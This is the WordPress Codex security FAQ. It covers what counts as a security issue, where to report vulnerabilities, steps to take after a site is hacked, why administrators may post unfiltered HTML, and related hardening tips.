Attention Interested in functions, hooks, classes, or methods? Check out the new WordPress Code Reference!

FAQ Security

Back to FAQ

What is a "security" issue?

A security issue (or security vulnerability) is a type of bug that affects the security of WordPress installations.

If you've found a bug in the WordPress core code that you have determined can be used to gain some level of access to a site running WordPress that you should not have, then that is a security issue.

Before you report a security issue, please bear in mind the following:

  1. Your blog being "hacked" is not a security issue. A security issue will involve knowing how the attacker got in and hacked your site. If you have details on the attack vector, then email us at security at wordpress.org. If not, report the issue on the Support Forums.
  2. Forgetting your password or losing access to your site is not a security issue. You should try resetting your password or contacting your site administrator or host for help.
  3. Generally, security issues are complex problems. If you want to report a security issue, then that's great! You're in the right place. However, be sure that what you're reporting is actually a security issue so you don't waste your own time or that of the experts you report it to.
  4. The security mailing addresses are NOT for support. Don't send general problems to them. Your message will not be replied to. Use the Support Forums instead.

Where do I report security issues?

Before reporting a security issue, please make sure you've read the section above and determined that the issue is actually one of security.

  • For a WordPress.com security issue, please see the Automattic Security page.
  • For a WordPress plugin security issue, email plugins [at] wordpress.org with as much detail as you can. You should also contact the plugin developer either via email (if it's listed in the plugin source code), or by posting in the support forum on their plugin page asking how best to send them details.
  • For a security issue with the self-hosted version of WordPress, email security [at] wordpress.org with as much detail as you can.

In all cases, you should never publish details of a security vulnerability. Doing so is irresponsible and unprofessional.

Where do I report copyright infringements, libel, and other legal issues?

WordPress.org does not host sites. WordPress.org provides publishing software that anyone can download and use. The organization, WordPress.org, has no control over who uses the software or how they use it. In other words, WordPress.org does NOT have the power to take down comments, posts, sites, or anything else.

Instead of trying to contact WordPress, perform a whois lookup to track down the operator or host of a particular site, then report the infringement to those organizations.

If you still can't determine the organization, these following articles by Plagiarism Today may help:

I've been hacked. What do I do now?

If you have been hacked you should navigate to the FAQ My Site Was Hacked for a more comprehensive list of steps.

Two good plugins to assist in your manual search of infections include:

They are not the end all to be all, but they could get you going in the right direction. Here is a short, succinct list, of things / actions you could also take:

  • Change passwords for all users, especially Administrators and Editors (The Sucuri Plugin can assist you with post-hack actions.)
  • If you upload files to your site via FTP, change your FTP password.
  • Clear FTP logs on your local machine, especially if you are using FileZilla on Windows
  • Re-install the latest version of WordPress, but don't override existing, do fresh copies (remove and readd)
  • Make sure all of your plugins and themes are up-to-date.
  • Check permissions of your files/folders in the install.
  • Check .htaccess file (Apache) for any additional rules added.
  • Look for backdoors via Filezilla
  • Update your security keys. (The Sucuri Plugin can assist you with post-hack actions.)

Why are some users allowed to post unfiltered HTML?

Users with Administrator or Editor roles are allowed to publish unfiltered HTML in post titles, post content, and comments. WordPress is, after all, a publishing tool, and people need to be able to include whatever markup they need to communicate. Users with lesser privileges are not allowed to post unfiltered content.

If you are running security tests against WordPress, use a lesser privileged user so that all content is filtered. If you are concerned about an Administrator putting XSS into content and stealing cookies, note that all cookies are marked for HTTP only delivery and are divided into privileged cookies used for admin pages and unprivileged cookies used for public facing pages. Content is never displayed unfiltered in the admin. Regardless, an Administrator has wide-ranging super powers among which unfiltered HTML is a lesser one.

In WordPress multisite, only Super Admin can publish unfiltered HTML, as all other users are considered untrusted.

To disable unfiltered HTML for all users, including administrators, you can add define( 'DISALLOW_UNFILTERED_HTML', true ); to wp-config.php.

Why are there path disclosures when directly loading certain files?

This is considered a server configuration problem. Never enable display_errors on a production site.

Why did I get this "Password Reset" email?

If you get an email saying "Someone has asked to reset the password for the following site and username" this means someone visited the password reset page on your blog. Anyone can visit this page since it must be open to all for it to be accessible to those who have lost their password. Your password can be reset only by those who can read your email. If your email account has not been compromised, you can ignore this email.

Back to FAQ